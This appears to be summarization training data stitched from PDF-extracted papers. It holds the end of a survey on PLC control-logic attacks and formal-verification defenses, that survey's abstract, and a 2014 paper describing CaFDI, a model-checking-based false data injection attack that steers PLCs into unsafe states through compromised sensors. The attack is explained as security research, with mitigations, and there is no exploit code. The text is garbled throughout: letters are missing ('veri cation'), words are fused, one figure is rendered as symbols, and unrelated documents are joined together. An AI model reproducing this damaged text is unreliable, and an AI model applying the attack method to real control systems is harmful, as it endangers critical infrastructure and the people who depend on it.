Arcade.PLC*, CEGAR Biha 11 [13] GI1 SG TP N/A IL SSRe ect in Coq, CompCert Brinksma 00 [16] GI3 SG MC N/A SFC SPIN/Promela, Uppaal Darv as 14 [25] GI1 SR MC CTL, LTL ST COI reduction, NuSMV Darv as 15 [27] GI1,GI3 SG EC N/A ST PLCspecif Darv as 16-1 [28] GI1 SG, FV N/A temporal logic ST PLCv erif, nuXmv, Uppaal Darv as 16-2 [29] GI1 SR MC, EC temporal logic LD,FBD PLCv erif, NuSMV , nuXmv, etc. Darv as 17 [30] GI1 BM N/A temporal logic IL PLCv erif, Xtext parser Giese 06 [41] GI1 BM, SG EC N/A ST GROOVE, ISABELLE, FUJABA Gourcuf f 06 [42] GI1,GI3 SR MC N/A ST,LD,IL NuSMV Hailesellasie 18 [44] GI1,GC FV MC N/A SFC,ST ,IL BIP, nuXmv, Uppaal,UBIS model Huang 19 [47] GI1 SG N/A N/A ST Kframework, KST model Kim 17 [56] GI1,GI3 FV MC, EC CTL FBD,LD CASE tools (Nude 2.0), NuSCR Moon 94 [74] GI1 SG MC CTL LD N/A Newell 18 [76] GI1,GI3 BM, SR TP N/A FBD PVS Theorem prover Niang 17 [77] GI3 FV MC N/A generic Uppaal, program translators Pavlovic 10 [79] GI1,GI3 SR MC CTL FBD NuSMV Rawlings 18 [81] GI1 SG, FV MC CTL, ACTL ST st2smv , SynthSMV* Mader 00 [66] GI1 BM N/A N/A generic N/A Ovatman 16 [78] GI1,GI3 BM, FV MC N/A generic N/A Moon 92 [75] GI1,GI3 ALL MC CTL LD aCTL model checker Bohlender 18 [14] GI1,GI3 SR MC N/A ST Z3,PLCOpen, Arcade.PLC Kuzmin 13 [61] GI1 BM N/A LTL ST Cadence SMV Bonfe 03 [15] GI3 BM N/A CTL generic SMV , CASE tools Chadwick 18 [20] GI3 BM, SG TP FOL LD Swansea Frey 00 [35] GI1,GI3 BM N/A N/A N/A N/A Yoo 09 [96] GI3 ALL MC, EC CTL FBD NuSCR, Cadence SMV , VIS, CASE Lamperiere 99 [62] GI1 BM N/A N/A generic N/A Kottler 17 [59] GI3 ALL N/A CTL LD NuSMV Younis 03 [97] GI1,GI3 BM N/A N/A generic N/A Rossi 00 [82] GI1 BM MC CTL, LTL LD Cadence SMV Vyatkin 99 [89] GI1 BM MC CTL FBD SESA model-analyserT1sourcecode Canet 00 [17] GI1,GI3 ALL MC LTL IL Cadence SMV Chang 18 [21] GI1 ALL MC LTL, CTL IL DotNetSiemensPLCT oolBoxLibrary McLaughlin 14 [71] GI1,GI3 ALL MC LTL IL TSV, Z3, NuSMV Xie 20 [93] GI1,GC,GA BM, SG, FV MC LTL IL SMT , NuXMVT2bytecode/binary Zonouz 14 [100] GI1,GI3 BM, SG, FV MC LTL IL Z3,NuSMV Carlsson 12 [18] GI FV MC CTL, LTL N/A NuSMV Cengic 06 [19] GI2 BM MC CTL FBD Supremica Galv ao 18 [36] GI3,GI4 SG MC CTL FBD ViVe/SESA Garcia 16 [40] GI3 FV MC DFA LD,ST N/A Janick e 15 [53] GI1,GI2 BM, SR MC ITL LD Tempura Luccarini 10 [65] GI3,GI4 BM, SR, SG TP CLIMB N/A SCIFF checker Mesli 16 [72] GI BM, SG, FV MC TCTL LD,FBD Uppaal Wang 13 [91] GI1,GI2 BM, SR, SG MC LTL, MTL IL BIP Zhang 19 [98] GI,GC ALL MC TPTL ST BUILDTSEQS algorithm Zhou 09 [99] GI BM, SR MC TCTL IL Uppaal Wan 09 [90] GI1,GI2 BM, FV TP Gallina LD Coq, Vernacular Garcia 19 [38] GI BM TP differential dL ST KeYmaera X Mokadem 10 [73] GI3 BM MC TCTL LD Uppaal Cheng 17 [23] GI2,GC BM N/A eFSA N/A LLVM DGT3runtime Ait 98 [5] GI2 SG TP FOL N/A Atelier B Defense F ocus: Behavior modeling (BM), State Reduction (SR), Speci cation Generation (SG), and F ormal V eri cation (FV). V eri cationtehcniques: model checking (MC), equivalence checking (EC), and theorem proving (TP). In tools: items in bold are self-developed, bold italics are open-source and *represent tools no longer mantained. de ned properties can cause implicitness. We recommend future research to consider domain-speci c properties asahybrid program consisted of continuous plant models aswell as discrete control algorithms. These properties canbe formalized using differential dynamic logic and veri edwith a sound proof calculus. Existing research [38] has 397 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:36:17 UTC from IEEE Xplore. Restrictions apply. formalized the dynamic logic model of a water treatment testbed controlled by a ST program. The formalizationaims to understand safety implications, and can onlysupport one task with boolean operations. Future researchshould explore the formalization of dynamic logic withthe goal of security veri cation, and support arithmeticoperations, multitask programs, and applications in otherdomains. 6.3.2. Incremental speci cation generation. We dis- cussed attacks using expanded input surfaces or a full chain of vulnerabilities in Section 4.2. We also discussed the challenges given the fast-evolving system design inSection 5.3.4. This leads us to think about incremental speci cation generation, with a full chain of behaviors,and update in a dynamic spectrum. Incremental speci -cation generation [5] has been designed for interactivesystems. In the PLC chain of control, interactions shouldconsider both the physical process changes, and the in-clusion of the engineering station. Modeled behaviorsfrom these new interactions should be compatible withexisting properties. To update in a dynamic spectrum, thebehavior changes from each interactive component shouldsupport automatic generation and comparison. This re-quires automatic translations between the behavior modelsof each component. The closest study is HyPLC [ 38], which supported automatic translation between the PLCprogram, and the physical plant model. However, incre-mental speci cation generation was not considered. Weencourage future research to investigate this direction, andseek interactive mutual re nement. 6.4. Veri cation 6.4.1. Real-time attack detection. As shown in Sections 5.4.3 and5.4.4, there is a high demand for runtime veri - cation beyond a high-level prototype. To perform runtimeveri cation, existing studies depend on engineering sta-tions. However, Section 4.1.3 has demonstrated runtime attacks aiming at evading or deceiving the engineering sta-tion from runtime detection. The engineering stations havebeen exposed to various vulnerabilities [1], [50], [51], dueto the rich features supported outside the scope of security.Therefore, we recommend future research to consider adedicated security component, such as the bump-in-the-wire solution provided by TSV [71]. This component ispromising in eliminating the resource constraints withina PLC, and allows the program to meet the strict cycletime. In addition to the real-time requirement, future re-search should also learn from existing attack studies [37],[54], and consider exploring the veri cation between thePLC and the other interacting components, including theengineering station. 6.4.2. Open-source tools and benchmarks. We dis- cussed in Section 5.4.4 that the lack of open-source tools and benchmarks have led to adhoc studies without evaluations on models and veri cation techniques. It ispromising to see PLCverif [26] become open-source andsupport integration of various model checking tools. Werecommend future studies to continue the developmentof open-source tools, to cover program modeling, statereduction, speci cation generation, and formal veri ca-tion. To adapt to broad use cases, we suggest the tools tobe IEC-61131 compliant, compatible with existing open-source PLC tools [7], and consider long time maintenance.We also recommend future studies to develop PLC se-curity benchmarks, including a collection of open-sourceprograms that are vendor-independent and can representindustrial complexities, and a set of security metrics thatcan support concrete evaluations. 6.4.3. Multitasks Veri cation. In Section 4.1.3,w eh a v e discussed attacks that can use PLC multitasks to perform a denial-of-service attacks, and spread stealthy worms. Todefend against multitask attacks, existing studies [39], [73]only considered checking the reaction time between tasksto detect failures of meeting the cycle time requirement.We recommend future research to consider more attackscenarios involved in multitask programs, for example,using one task to spy or spread malicious code to the otherco-located tasks, as did in PLCInject [58] and PLC-Blaster[85], or manipulating shared resources (e.g. global vari-ables) between tasks to produce non-deterministic outputto disturb the physical processes. Future research shouldexplore the veri cation of these attack scenarios, with theconsideration of task intervals and priorities at variousgranularities. 7. Conclusion This paper provided a systematization of knowl- edge based on control logic modi cation and formalveri cation-based defense. We categorized existing studiesbased on threat models, security goals, and underlyingweaknesses. We discussed the techniques and approachesapplied by these studies. Our systematization showed thatcontrol logic modi cation attacks have been evolved withthe system design. Advanced attacks could compromisethe whole chain of control, and in the meantime evadevarious security detection methods. We found that formalveri cation based defense studies focus more on integritythan con dentiality and availability. We also found thatthe majority of the research investigate ad-hoc formalveri cation techniques, and the barriers exist in everyaspect of formal veri cation. To overcome these barriers, we suggest a full chain of protection and we encourage future research to investigatethe following: (1) formalize plant behaviors to defendinput manipulation attacks, (2) explore stealthy attackdetection with state reduction techniques, (3) automatedomain-speci c speci cation generation and incrementalspeci cation generation, and (4) explore real-time veri ca-tion with more support in open-source tools and thoroughevaluation. Acknowledgment The authors would like to thank the anonymous re- viewers for their insightful comments. This project wassupported by the National Science Foundation (Grant#:CNS-1748334) and the Army Research Of ce (Grant#:W911NF-18-1-0093). Any opinions, ndings, and con-clusions or recommendations expressed in this paper are 398 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:36:17 UTC from IEEE Xplore. Restrictions apply. those of the authors and do not necessarily re ect the views of the funding agencies or sponsors.
Summary:
Programmable Logic Controllers (PLCs) play a critical role in the industrial control systems. Vulnerabilities in PLC programs might lead to attacks causing devastatingconsequences to the critical infrastructure, as shown inStuxnet and similar attacks. In recent years, we have seenan exponential increase in vulnerabilities reported for PLCcontrol logic. Looking back on past research, we foundextensive studies explored control logic modi cation attacks,as well as formal veri cation-based security solutions. We performed systematization on these studies, and found attacks that can compromise a full chain of controland evade detection. However, the majority of the formalveri cation research investigated ad-hoc techniques targetingPLC programs. We discovered challenges in every aspectof formal veri cation, rising from (1) the ever-expandingattack surface from evolved system design, (2) the real-timeconstraint during the program execution, and (3) the barrierin security evaluation given proprietary and vendor-speci cdependencies on different techniques. Based on the knowl-edge systematization, we provide a set of recommendationsfor future research directions, and we highlight the need ofdefending security issues besides safety issues.
|
Summarize:
I. I NTRODUCTION The power grid is a critical interconnected infrastructure whose reliable operation depends crucially on its cyber assets.Today, the reliability of the interdependent power and cyberinfrastructures making up the grid is largely managed throughtraditional purely-cyber security solutions. However, those methods cannot adequately protect cyber-physical platformsagainst emerging intrusions that consider both cyber andphysical assets. As a case in point, Stuxnet malware compro-mised human machine interface (HMI) servers and uploaded malicious code to programmable logic controllers (PLCs) 1 to physically damage the PLC-controlled centrifuges [12]. However generally, HMI servers reside within well-protectedpower control networks, and are often very challenging to com-promise. This paper presents a false data injection attack thatmakes PLCs perform malicious actions through manipulationof their inputs. PLC s inputs come from remote sensors that are assumed to be compromised in FDI attacks generally. Theproposed attack does not require penetration into hardenedcontrol networks and malicious code uploads. From a data perspective, power systems consist of sensor data acquisition, processing and control command. The infor- mation path from the eld sensors to end-point power controlnetwork assets, e.g., PLCs, enabled power system applicationssuch as state estimation and equipment control. The dataintegrity within the information path may be low for manyreasons, including miscon gurations, sensor or communicationfailures, or coordinated false data injection attacks. Indeed, 1PLCs are MIMO micro-controller devices used widely in industrial control systems for control automation purposes.noisy data are constantly present in the system, yet the system maintains a high level of reliability due to mechanisms putin place to detect and deal with such data. However, recentresearch [20], [30] has shown that maliciously coordinatedfalse data injection attacks may be able to bypass traditionalstate estimation mechanisms put in place to detect noisydata, and that such attacks may impact power system stateestimation applications to manipulate the calculated systemstate estimate [18], [26], [28]. Arguably, the feasibility of the past false data injection attacks against power state estimation applications is limitedin practice due to three main reasons. First, they mostly as-sume complete real-time knowledge regarding the whole inter-connected power-system s detailed topology with potentiallymany power buses. Practically speaking, the power systemtopologies change frequently as a result of real-time control ac-tions, e.g., circuit breaker recon gurations, and hence stealthyand malicious acquisition of real-time topological information is often hard in practice. Second, the past attacks require a large number of compromised sensors within the power grid to affectthe system s observability from power operators viewpoint.Finally, the past attacks show how the state estimation serverscould be misled; however they completely ignore the controlalgorithms that use the calculated state estimates to control theunderlying physical components. We present CaFDI, a new controller-aware false data injection attack against cyber-physical platforms, i.e., PLCdevices speci cally. The attack eliminates the above-mentionedrestrictions by targeting individual monitoring and controlsubstations. The attack requires limited local high-level infor-mation about the substation con guration, and the control overfew compromised sensors within the substation that feed data to the controlling PLC devices. The attack takes into accountthe controller algorithm run by the PLC to make it generatemalicious control commands through manipulation of its input values. It is noteworthy that controller algorithm knowledgeis optional for the attack, and could be provided as a high-level pseudo-code procedural description or the complete PLCinstruction list program if available. CaFDI attack consists of two main steps. First, a high-level description of the substation setting and control procedures isused to create an abstract formal nite state machine, so-calledB uchi automaton, that represents the controller code. CaFDI does to require direct access to PLC code to carry out the attack(even though the direct code access would increase the attack saccuracy). If the code is available, CaFDI uses it to generate its corresponding B uchi automaton. Otherwise, CaFDI learns a high-level description of the control logic through observationof the target PLC s I/O behavior. Second, given malicious2014 IEEE International Conference on Smart Grid Communications 978-1-4799-4934-2/14/$31.00 2014 IEEE 848Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:38:48 UTC from IEEE Xplore. Restrictions apply. attack objectives, i.e., set the generator set-point to in nity2, CaFDI explores the generated automaton via formal modelchecking techniques to determine if the malicious objective issatis able under any circumstances, i.e., set of input values.If satis able, CaFDI calculates the malicious input values and send them to the PLC 3to make it generate malicious control outputs, e.g., order the generator to generate in nity amountof power. This paper presents the following contributions: We present a novel control-aware false data injection attacks against programmable logic controllers. We present a logical formalism to describe normal and unsafe cyber-physical system behavior formally. We have evaluated and validated the attack s feasibility on realistic cyber-physical controller programs. II. P ROGRAMMABLE CONTROLLERS Programmable logic controllers (PLCs) form the border between computation and physical processes in most controlsystems. A PLC must not only automatically regulate a phys-ical process, it must also provide human operators with aninterface to the plant for remote operations. Despite theseimportant responsibilities, PLCs suffer from numerous wellknown security issues, and are often exposed to wide areanetworks. By their very architecture, PLCs have no way ofdefending themselves from malicious sensor or control signals,or malicious code uploading. A. PLC Basics PLCs ful l a number of different responsibilities. Primarily, they perform real-time control of physical processes. Thisinvolves repeatedly reading sensor measurements from theplant, using them to calculate necessary changes, and actuating those changes with physical machinery. This three step processis known as the scan cycle . PLCs execute scan cycles at frequencies ranging from one minute down to one millisecond.During each scan cycle, the PLC executes its control logic program over the sensor measurements to decide what changesto make in the plant. A secondary responsibility handled byPLCs is to act as a gateway between the plant and controlroom, where human operators monitor the process. In this role,the PLC aggregates process statistics for the control room, andmanipulates the plant on behalf of the human operators. The PLC s control logic is effectively a mapping from sensor inputs to outputs for plant machinery. Control logicis typically written in a graphical language such as relayladder logic, where the program is represented as a set ofconcurrently executing circuits, or function block diagram,where the program is represented as a circuit containing blocksfor each function applied to the input signals. Control logicoften implements sequential logic , in which inputs and outputs are Boolean values. This is commonly used for automatingprocesses based on sequences of steps in which devices areeither on or off. In addition to sequential logic, PLCs oftenhave built in PID (proportional integral derivative) controllers.PID controllers are used to hold a time-varying real-valuedprocess at a speci c set-point value. A classic example of this 2B uchi automata are discrete state-based models; however, they handle continuous dynamics too through proper atomic proposition de nitions [3]. 3Several input calculation and corruption attempts may be needed as the automaton may not be accurate representation of the PLC controller code, i.e., if the automaton generated based on the high-level description. Fig. 1. The CaFDI Threat Model. is the problem of balancing a ball on a stick by moving the platform beneath the stick in two dimensions. B. PLC Security Issues Despite their critical importance in control systems, in- suf cient effort has been spent on securing PLCs. New vul-nerabilities are increasingly being identi ed in PLC and theirsurrounding control system equipment [4], [6], [7], [24]. In ad-dition, PLCs are often exposed to Internet-connected corporatenetworks [29], and sometimes directly to the Internet [1], [11].PLCs are often protected only by passwords, and hard codedbackdoor accounts are often added by vendors. PLCs have noaccess control models for manipulating physical devices, andthus any adversary that can upload code to a PLC can havecomplete control over the plant machinery [13]. III. O VERVIEW We describe the threat model that is required to carry out the CaFDI attack against PLC controllers, overview the attacksteps and discuss the main challenges faced by the attackers. A. Threat Model There are several mandatory security requirements for crit- ical power-grid infrastructures, such as north American electricreliability corporation critical infrastructure protection (NERCCIP) plan [23], i.e., a set of requirements designed to securethe critical power control network assets, i.e., HMI servers.For compliance, power utilities often deploy strict securitymeasures such as restricted network access control policies.Therefore, malicious direct and/or indirect remote access toassets within the control network and the underlying power system components that those assets control/monitor is often extremely hard in practice. As a case in point, it took severalyears and revisions even for the complicated nation-stateand targeted Stuxnet worm to reach and compromise a HMIserver. However, as shown in the past research on false datainjection attacks [5], [9], [19], [20], [30], remote power systemsensors such as phasor measurement units are less protectedin practice as they are distributed geographically across thecountry, and hence can be accessed and compromised moresimply compared to the assets within the control networks. We assume that the attackers have knowledge of the high- level infrastructural con guration, i.e., the sensors/actuatorsconnected to PLCs inputs/outputs. The attackers do not haveto penetrate into the control network; CaFDI can still succeedeven if the HMI server is not compromised and the attackers do2014 IEEE International Conference on Smart Grid Communications 849Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:38:48 UTC from IEEE Xplore. Restrictions apply. +'! # " " ' &" " # ""+! ' ,&&" " - &" " ( # " ' !)!" "" !)!" "" ,% """- # &! &"" &! Fig. 2. The CaFDI Overview. not gain the privilege to upload malicious controller program on the PLC device. We assume however that the attackers havemanaged to compromise the sensors that send measurementsto the PLC. Although CaFDI does not require the knowledgeabout the detailed controller code that is running on the PLC,the access to that code would help attackers to carry out theattacker more effectively, i.e., to succeed with minimal numberof trials. Figure 1 shows the threat model and setup for CaFDI. B. CaFDI Overview and Challenges CaFDI is essentially to use the adversarial control over the distributed sensors and send corrupted measurements to thePLC that is running legitimate controller program uploadedby a non-compromised HMI server (Figure 2). The ultimatemalicious objective is to exploit the controller program slogical bugs and make it output unsafe control commands tothe local actuators. A trivial solution is to exhaustively tryout all possible input vector values an hope for getting PLCto output unsafe control commands at some point. There aretwo main problems with such trial and error attacks. First,it does not scale up ef ciently in real-world situations. Forinstance every Siemens digital I/O module has 4 bytes (32 bits). Each input can be true or false, and hence the attack has to try 2 32possible values. Second, trying out all possible values will increase the detectability likelihood of the attack as theoperators will most likely become suspicious to the underlyingsystem s behavior. Consequently, CaFDI needs to somehowreduce it search space so that the probability of detection isminimized. To that end, there are three challenges that CaFDIneed to overcome. First, the attackers need a formalism toformulate their observation/understanding of the infrastructuralbehavior, i.e., PLC s controller program logic. The formaldescription will help CaFDI later to skip many unnecessaryinput vector trials. Second, a formal description language isneeded to formulate the unsafe infrastructural behavior that theattackers are looking for. Finally, given the descriptions of thecontroller logic and adversarial objectives, an ef cient searchengine should explore the space for promising input vectorvalues that, if applied, will cause the system go unsafe. IV . C ONTROL LOGIC MODELING A. Controller Logic Description To formulate the controller PLC device behavior (program), the linear temporal logic (LTL) formalism [3], [25] is used. Letus de ne Ato be a nite set of atomic logical propositions about the system {b 1,b2, ,b|A|}, e.g., relay R1is open. and =2Aa nite alphabet composed of the abovementioned propositions. Every element of the alphabet is a possiblyempty set of propositions from A, and is denoted by ai, e.g., ai=b1,b4,b9. The set of linear temporal logic-based security requirements is inductively de ned by the grammar ::=true|b| | | U |X , (1) where the operators represent negation ( ), logical OR ( ), temporal Until ( U), and temporal Next ( X). In particular, the formula aU b holds, if aholds until boccurs, and The formula Xaholds, if aholds at the next state on the path. For example, consider a traf c light system with Boolean variables g1and g2that activate green lights for intersecting streets when true. According to the attacker s observation, each light goes yellowy 1=true before turning red r1=true, or both lights are never green at the same time has two atomic propositions: a g1= true , and b g2=true . The global LTL system description is then stated as G[( a b) (g1 Xr1) (g2 Xr2)]. Following our threat model, the adversaries do not have direct access to the HMI server or PLC device, and hencecannot obtain a copy of the controller program code. Therefore,the attackers, who could observe the normal operation of thecontroller PLC in actual production mode, use that informationto describe the deployed control logic to facilitate CaFDI sdeployment. In particular, the attackers need to assign atomicpropositions for the PLC s input and output wires and describetheir logical and temporal observed correlation using the LTLformalism. It is noteworthy that the formal system descriptionis a one-time effort for the adversaries without the source codeaccess, and furthermore, the description does not have to be acomplete and precise representation of the controller program.Instead, a high-level (or even no) description of the logic willsuf ce at the cost of more time required to nd the optimalinput vector for the attack (Section V). B. System Model Generation For formal attack design, i.e., to nd the optimal input vector to cause the unsafe output vector, CaFDI needs totranslate the control logic LTL description into a nite state machine monitor M( )that will be used later for adversarial exploration and input vector trials. CaFDI starts with convert-ing control logic formula to its corresponding B uchi automaton automatically. In particular, like in [14], CaFDI implements arecursive depth rst search algorithm to construct the corre-sponding generalized B uchi automaton [8] that goes through a simple degeneralization transformation [27] to result in a classical B uchi automaton. Consequently, CaFDI translates the generated B uchi automaton into a deterministic state machine using the well-known power set construction algorithm [2],[3]. Finally, to minimize the size of the generated automaton,and hence the performance overhead of the CaFDI frameworkon the target system, CaFDI also implement a minimizationalgorithm [17] to produce the automaton with provably min-imum number of states for the initial control logic formula.The generated B uchi automaton is essentially a state-based representation of the PLC s controller program that capturesa superset of program s behavioral traces. This is because theattacker, who describes the controller using LTL formalisminitially, does not necessarily have the source code access andhence may not be aware of all logical control ow details ofthe running program. V. A DVERSARIAL EXPLORA TION Given the controller s behavioral model, the attacker spec- i es an unsafe system state as the target state for CaFDI to2014 IEEE International Conference on Smart Grid Communications 850Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:38:48 UTC from IEEE Xplore. Restrictions apply. nd the optimal input vector to drive the system towards the determined unsafe state. A. F ormal Attack Description To design an attack, CaFDI needs to know its ultimate objective that is often a particular damaging incident, such asa critical transmission line outage or power generator blow upas a result of high generation set points. Formally, each ofthese incidents are represented mathematically as one or morestates in the generated controller behavioral model (B uchi au- tomaton). In CaFDI, the attacker describes the target damagingincident using simple propositions, e.g., Relay R 1is open or Generation set point on the generator G 2>3000 MW .I ti s noteworthy that CaFDI also supports more complex adversarialstate descriptions using LTL temporal operators; however, itwill require more advanced power system and computer logic knowledge 4. CaFDI converts the target unsafe state description to its corresponding B uchi automaton as discussed in Section IV -B. The generated automaton will represent all possiblestates where the system would be operating unsafely, andwill be used later to design attack, i.e., calculate the optimalmalicious PLC input vector. B. System-based Attack Design CaFDI s ultimate goal is to come up with a set of suitable input vectors for the attackers to make the compromisedsensors send to the PLC. To this end, CaFDI will make useof the two generated B uchi automata for controller behavioral modeling B cand unsafe target state description Bu. CaFDI creates a state-based Cartesian product model of the two graphmodels B cand Bu, i.e., P(Bc,Bu), where each state has two sub-states referring to the corresponding Bcand Bustates. Consequently, CaFDI starts from the initial state of Pand explores the state space recursively for an accepting path that, if found, proves that the PLC program model Bumay result in an execution trace where Buis satis ed, i.e., the system enters its unsafe state. In case any accepting path is detected,it will be considered as an attack path and its correspondinginput vector values are stored in a table T; otherwise, the controller is secure and cannot enter an unsafe state under anycircumstances. Consequently, the table Tcontains all inputs vectors that cover all possible attack paths in P. C. Stealthy Attack CaFDI s nal step is to make the sensors send corrupted data, i.e., the calculated input vectors in T, to the PLC controller. However, some of the input vectors may not result inan unsafe system state, because the initial controller behavioraldescription by the attacker is often not absolutely precise.Therefore, the Tentries should be tried out once at a time until the unsafe system state occurs. Given that the initial controller behavioral description is correct (even if not accurate 5), such an iterative input vector retrial procedure is guaranteed torealize an unsafe system if there is any. However, the optimal adversarial procedure would be to remain stealthy during 4To provide more user/attacker-friendly interface, there have been several solutions that translate high-level and simple-to-understand descriptions, e.g., English sentences, to low-level formal LTL formula. This is outside of the scope of this paper, and interested reader is referred to [15]. 5We call the description correct if the controller program complies the speci cation completely. The description is called accurate if it captures every aspect of the controller program. (a) System Description (b) Unsafe State (c) Product Automaton (d) Simpli ed Product Automaton Fig. 3. The Automatically Generated Automata for CaFDI) the trial iterations, and hence to try out more stealthy input vectors rst and leaving the more noticeable ones for thelater if the less stealthy vectors do not realize the unsafesystem state. As a clari cation example, a Boolean inputwith a LED indicator could be considered as a noticeableinput (by the operator), and is preferred to be kept unchangedto maintain the attack s undetectability. To this end, CaFDIrequires the attacker to rank the input wires in terms of theirdegrees of noticeability. Consequently, CaFDI obtains the inputvector s current legitimate value and ranks the input vectorswithin Taccordingly such that the value of more noticeable inputs within the top ranked vectors have the same value astheir corresponding legitimate values, and hence triggers theminimum suspicious level. VI. E V ALUA TIONS A. Control System Case Study PLCs are a critical component of many control systems, including power generation and distribution. To make sure thatCaFDI can be used for practical safety veri cation of real-world infrastructures, we deployed CaFDI on a PLC controllerprogram on an industrial control system. Assembly way: items2014 IEEE International Conference on Smart Grid Communications 851Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:38:48 UTC from IEEE Xplore. Restrictions apply. are moved down an assembly line by a belt. A light barrier detects when an item has arrived at an assembly station, and anarm moves to hold the item in place. A part is then assembledwith the item, and the barrier removed. The process repeatsfurther down the line. The following shows a snippet of thecore part of the controller program that the attacker doesnot have access to. Brie y, after the variable declaration, the controller moves down the arm, i.e., the output variable Q0.0 once the sensor detects the object on the belt, i.e., the inputvariable I0.0. BEGIN NETWORK 1 A I 0.0; L S5T#5S; SP T 1; NOP 0; LT 1 ;T MW 10; NOP 0; AT 1 ; = Q 0.0; ... We played as an attacker and, before looking at the code above, described the PLC behavior by observing the TrySim 3D simulator6running the code on a sim- ulated environment. We speci ed the behavior as c= G(!Linear-Mover ULight-Barrier-Sensor ), i.e., the arm stays off until the light sensor detects an object. CaFDI generatedthe corresponding automaton automatically (see Figure 3(a)).Additionally, we described the unsafe state simply as u= Linear-Mover, to control the arm whenever desired such aswhile the belt is moving and moving objects are not in suitablepositions. Figure 3(b) shows the generated B uchi automaton that describes the adversarial LTL formula. Consequently,CaFDI generates the product model Pusing the two generated automata B cand Bu(see Figure 3(c)). Finally, CaFDI simpli es the generated product automaton using a reachability analysis from its initial state. Figure 3(d) shows the re ned model thatCaFDI uses to search for adversarial input vectors, i.e., thelight barrier sensor value in this case. The search immediatelyresults in the value 1 for the light barrier sensor. CaFDI thensends corrupted sensor value 1 that leads to malicious armmotion at attacker s will. B. Scalability Furthermore, for a generic evaluation of the automata size range that CaFDI has to process in real-world settings, we mea-sured the size of generated automata for typical and frequently used linear temporal logic-based system speci cation formula 7 introduced in [10]. The state space sizes of the generated automata are all below 35 states (see Figure 4(a)). CaFDIcompleted the LTL-to-B uchi conversion for individual tem- poral requirements in approximately 0 .58 seconds on average (see Figure 4(b)) that is a reasonable time requirement forreal-world settings. VII. R ELA TED WORK False data injection attacks. There have been several recent related projects that focus on false data injection attacks[5], [19], [20] on state estimation. The objective is for anadversary to modify multiple measurements in a coordinated manner to in uence the estimate of the state. The attack 6Available at http://www.trysim.de. 7http://patterns.projects.cis.ksu.edu/documentation/patterns/ltl.shtml.needs to remain undetected by traditional bad-data detection schemes. Consequently, several countermeasures against suchattacks have been proposed (e.g., [5], [9], [19]). The impact ofsuch false data injections on power system operations could beremarkable [18], [26], [28]. Speci cally, [18], [28] show thatfalse data injection attacks can be used to manipulate real-timeprices in the electricity markets, while [26] shows that they can cause operators to make suboptimal power dispatch decisions. Countermeasures against FDI intrusions. Kosut et al. [19] introduce a mathematical procedure to localize falsedata injection intrusions via the generalized likelihood ratiotest. Zonouz et al. [30] propose SCPSE a cyber-physicalstate estimation algorithm that considers sensor data fromboth power sensors and cyber intrusion detection systems tocalculate an accurate estimate of the system state. Bobba etal. [5] and Dan et al. [9] investigate how the knowledge aboutpower system topology and the inter-sensor data correlationscan be leveraged to detect malicious false data injection, andprovide insight into the nature of unobservable attacks. Gianiet al. [16] provide further characterization of unobservableattacks. However, unlike CaFDI, those efforts only leveragepower system measurements except for [9] which leveragescommunication infrastructure topology information as well. VIII. D ISCUSSIONS A. Real-World Feasibility The feasibility of the attack depends on several factors: the attacker s degree of knowledge about the target facilityand the physical vulnerability of sensors in the target facility.Compared to the existing false data injection attacks on stateestimators, the demonstrated controller-targeted attacks requireless knowledge about the system. As shown, exact knowledge of the PLC s control program is not needed for controller-aware attacks. State estimation attacks, on the other hand, assume the attacker has exact knowledge of the whole targetinter-connected power system s topology (typically encoded asanobservation matrix , as well as the full control algorithm. Furthermore, state estimation attacks require control of a sig-ni cant percentage of sensors. As demonstrated, for controller-aware attacks, control of a single sensor may be suf cient toachieve the desired affect on a victim control system. A general question regarding feasibility is how con dent an attacker can be in the attack s outcome. In state estimation attacks on very large systems, the adversary cannot make any statement about what effect the attack will have on thephysical system. In this case, the adversary can only becon dent that the injected sensor measurements will slip bythe bad data detector. In state estimation attacks against closedloop control systems where the control algorithm is known,the adversary can push the victim control system arbitrarilyaway from its desired operating state, assuming it has anunstable eigenvalue [22]. The con dence level in controller-aware attacks, on the other hand, can be determined a priori based on the size of product B uchi automaton (Section V -B). B. Potential Mitigation Techniques The most straightforward mitigation technique against any false data injection attack is to secure the sensors and thedata channels between sensors and the PLC. For physicallydistributed systems, absolute sensor hardening is not feasible, because the sensors are often deployed in remote locations,and physical manipulations without compromising the sensors2014 IEEE International Conference on Smart Grid Communications 852Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:38:48 UTC from IEEE Xplore. Restrictions apply. 0 5 10 15 20 25 30 35 40 1 3 5 7 9 11 13 15 17 19 21 23 25 27 29 31 33 35 37 39 41 43 45 47 49 51 53 55 Total Number of Automaton States Typical Temporal Security Specification Patterns (a) Automata for Frequently Used Speci cations (b) Automaton Generation Time Requirement Fig. 4. CaFDI Scalability Results may suf ce to report a desired sensor reading to the con- trol network. Physical tamper detections, e.g., similar to tiltsensors used in distribution smart meters, would be effectivein detecting sensor manipulation. Similarly, redundant sensordeployment would increase the burden on the adversary, butwould be costly. A more effective defense would be to formallyverify that PLC control programs will not cause undesiredplant behavior given any input vector [21]. Thus, regardless of the attacker s capability to compromise sensors and knowl-edge of the plant, malicious behavior will be prevented. Thisis clearly a challenging endeavor as it requires an explicitstatement of all undesired behavior, i.e., the adversary needsto design only one attack (malicious output values) that thecontroller program veri er does not check for. IX. C ONCLUSIONS We presented CaFDI, a controller-aware false data injection attack against cyber-physical industrial control networks wherePLC devices are used to automate the control of the physicalequipment based on the input sensor measurements. CaFDIcreates a formal model of the PLC code and makes use ofmodel checking techniques to explore the created model to de-termine, and later feed, input values to make the PLC generatemalicious control commands. Our empirical evaluations provesCaFDI s feasibility on real-world PLC controller programs. R EFERENCES [1] Shodan. http://www.shodanhq.net. [2] A. Bauer, M. Leucker, and C. Schallhart. Comparing ltl semantics for runtime veri cation. J. Log. and Comput. , 20(3):651 674, June 2010. [3] A. Bauer, M. Leucker, and C. Schallhart. Runtime V eri cation for LTL and TLTL. ACM Transactions on Software Engineering and Methodology , 20(4):14:1 14:64, 2011. [4] D. Beresford. Exploiting Siemens Simatic S7 PLCs. In Black Hat USA , 2011. [5] R. B. Bobba, K. M. 